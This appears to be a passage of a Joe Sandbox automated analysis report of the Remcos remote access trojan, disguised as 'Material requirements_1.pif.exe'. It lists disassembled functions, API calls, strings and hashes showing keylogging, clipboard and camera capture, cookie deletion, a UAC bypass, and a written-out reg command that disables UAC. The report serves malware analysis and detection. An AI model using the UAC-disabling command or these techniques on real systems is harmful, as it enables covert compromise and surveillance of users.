                        • API ID: CloseEnumInfoOpenQuerysend
                        • String ID: TUFTUF$>G$DG$DG
                        • API String ID: 3114080316-344394840
                        • Opcode ID: 5b34330ed71f65fa879f2c54c0df273489eed1ff039e681fa038a06f30a006a0
                        • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                        • Opcode Fuzzy Hash: 5b34330ed71f65fa879f2c54c0df273489eed1ff039e681fa038a06f30a006a0
                        • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 00437ABB
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AC3
                        • _ValidateLocalCookies.LIBCMT ref: 00437B51
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                        • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 1170836740-1018135373
                        • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                        • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                        • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                        • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                        APIs
                          • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                          • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                          • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                        • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                        • API String ID: 1133728706-4073444585
                        • Opcode ID: 951235f85e48bb3d128a26db13e089d8687f47fe997c8e03be2a900eced236d5
                        • Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
                        • Opcode Fuzzy Hash: 951235f85e48bb3d128a26db13e089d8687f47fe997c8e03be2a900eced236d5
                        • Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                        • Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
                        • Opcode Fuzzy Hash: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                        • Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                        • int.LIBCPMT ref: 0040FC0F
                          • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                          • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                        • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                        • String ID: p[G
                        • API String ID: 2536120697-440918510
                        • Opcode ID: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
                        • Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
                        • Opcode Fuzzy Hash: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
                        • Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
                        APIs
                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                        • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                        • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                        Strings
                        • http://geoplugin.net/json.gp, xrefs: 0041A55E
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleOpen$FileRead
                        • String ID: http://geoplugin.net/json.gp
                        • API String ID: 3121278467-91888290
                        • Opcode ID: d6f499ad1e8f2f32babf086a4b04f4711f6d8a57175f587e6094264b919902b7
                        • Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
                        • Opcode Fuzzy Hash: d6f499ad1e8f2f32babf086a4b04f4711f6d8a57175f587e6094264b919902b7
                        • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA
                        APIs
                          • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                        • _free.LIBCMT ref: 0044FD39
                          • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                        • _free.LIBCMT ref: 0044FD44
                        • _free.LIBCMT ref: 0044FD4F
                        • _free.LIBCMT ref: 0044FDA3
                        • _free.LIBCMT ref: 0044FDAE
                        • _free.LIBCMT ref: 0044FDB9
                        • _free.LIBCMT ref: 0044FDC4
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                        • Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
                        • Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655
                        APIs
                        • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\Material requirements_1.pif.exe), ref: 00406835
                          • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                          • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                        • CoUninitialize.OLE32 ref: 0040688E
                        Similarity
                        • API ID: InitializeObjectUninitialize_wcslen
                        • String ID: C:\Users\user\Desktop\Material requirements_1.pif.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                        • API String ID: 3851391207-1996810057
                        • Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                        • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                        • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                        • int.LIBCPMT ref: 0040FEF2
                          • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                          • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                        • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                        Similarity
                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                        • String ID: h]G
                        • API String ID: 2536120697-1579725984
                        • Opcode ID: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
                        • Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
                        • Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789
                        APIs
                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                        • GetLastError.KERNEL32 ref: 0040B2EE
                        Strings
                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                        • UserProfile, xrefs: 0040B2B4
                        • [Chrome Cookies found, cleared!], xrefs: 0040B314
                        • [Chrome Cookies not found], xrefs: 0040B308
                        Similarity
                        • API ID: DeleteErrorFileLast
                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                        • API String ID: 2018770650-304995407
                        • Opcode ID: d66ece4a976f4d448fc3a6911c1cd710a05d5aa7b72c80177d91237d75f1b396
                        • Instruction ID: 57831ae66bbe87b328e3caf482cfdb9a18bfb77b2c204d956758bc207329a0f7
                        • Instruction Fuzzy Hash: ED01A23164410557CB0477B5DD6B8AF3624ED50708F60013FF802B22E2FE3A9A0586CE
                        APIs
                        • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                        • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                        Similarity
                        • API ID: Console$AllocOutputShowWindow
                        • String ID: Remcos v$5.3.0 Pro$CONOUT$
                        • API String ID: 2425139147-2527699604
                        • Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                        • Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
                        • Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D
                        Similarity
                        • API ID:
                        • String ID: (CG$C:\Users\user\Desktop\Material requirements_1.pif.exe$BG
                        • API String ID: 0-3108968625
                        • Opcode ID: 436699010963ecd03ae3a912ac3b80d145bf64b66cbd996a99d31e723bd19539
                        • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                        • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                        APIs
                        • __allrem.LIBCMT ref: 00439799
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                        • __allrem.LIBCMT ref: 004397CC
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                        • __allrem.LIBCMT ref: 00439801
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                        Similarity
                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 1992179935-0
                        • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                        • Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
                        • Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758
                        Similarity
                        • API ID: __cftoe
                        • String ID:
                        • API String ID: 4189289331-0
                        • Opcode ID: 07fcb3c060a749777e725642930ed18157a1f5019e1f3146b4d3bc33616e3b2a
                        • Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
                        • Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 00403E8A
                          • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                        Similarity
                        • API ID: H_prologSleep
                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                        • API String ID: 3469354165-462540288
                        • Opcode ID: b8e9e228615381c613a5fe4a24ae204d60489973bad034a9f17b21e91d3d6061
                        • Instruction ID: a615deab89d52a04eef9df102bd8b4982dd8b49b1eab8c4ad016fc0191aaad38
                        • Instruction Fuzzy Hash: E941A330A0420196CA14FB79C816AAD3A655B45704F00413FF809A73E2EF7C9A85C7CF
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
                        • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
                        Similarity
                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                        • String ID:
                        • API String ID: 493672254-0
                        • Opcode ID: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                        • Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
                        • Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9
                        APIs
                        • GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
                        • SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                        • Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
                        • Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C
                        APIs
                        • GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                        • _free.LIBCMT ref: 00446F06
                        • _free.LIBCMT ref: 00446F2E
                        • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                        • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                        • _abort.LIBCMT ref: 00446F4D
                        Similarity
                        • API ID: ErrorLast$_free$_abort
                        • String ID:
                        • API String ID: 3160817290-0
                        • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                        • Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
                        • Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                        • Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
                        • Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                        • Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
                        • Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                        • Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
                        • Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8
                        APIs
                        • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                        Similarity
                        • API ID: Enum$InfoQueryValue
                        • String ID: [regsplt]$DG
                        • API String ID: 3554306468-1089238109
                        • Opcode ID: 04be85a10a65fedb481150b8bc6c203764df31fda0f784146e603b05117797e8
                        • Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
                        • Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A
                        APIs
                          • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                          • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                          • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                        • __Init_thread_footer.LIBCMT ref: 0040AEA7
                          • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                          • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                        • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                        • API String ID: 2974294136-4018440003
                        • Opcode ID: d8cc1fc12807fd958afa10ea2d8e05a8c1945a4568a2f4f986646b09a49f41e4
                        • Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
                        • Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
                        APIs
                        • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                        • wsprintfW.USER32 ref: 0040A905
                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                        Similarity
                        • API ID: EventLocalTimewsprintf
                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                        • API String ID: 1497725170-248792730
                        • Opcode ID: c45d0d8330676a24f779125fc54340976b5d318e4a9b5b1d8d93ca89959c89e3
                        • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                        • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                        • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                        • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                        Similarity
                        • API ID: File$CloseCreateHandleSizeSleep
                        • String ID: `AG
                        • API String ID: 1958988193-3058481221
                        • Opcode ID: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
                        • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                        • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                        APIs
                        • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                        • GetLastError.KERNEL32 ref: 0041CAA1
                        Similarity
                        • API ID: ClassCreateErrorLastRegisterWindow
                        • String ID: 0$MsgWindowClass
                        • API String ID: 2877667751-2410386613
                        • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                        • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                        • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                        APIs
                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                        • CloseHandle.KERNEL32(?), ref: 00406A0F
                        • CloseHandle.KERNEL32(?), ref: 00406A14
                        Strings
                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                        • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                        Similarity
                        • API ID: CloseHandle$CreateProcess
                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                        • API String ID: 2922976086-4183131282
                        • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                        • Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
                        • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                        • Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002), ref: 00442609
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
                        • FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,00445408,?,0044253A,00445408,0046DAE0,0000000C,00442691,00445408,00000002,00000000), ref: 0044263F
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                        • Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
                        • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                        • Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C
                        APIs
                        • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                        • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                        • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: CloseCreateValue
                        • String ID: pth_unenc$BG
                        • API String ID: 1818849710-2233081382
                        • Opcode ID: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                        • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                        • Opcode Fuzzy Hash: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                        • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                        APIs
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
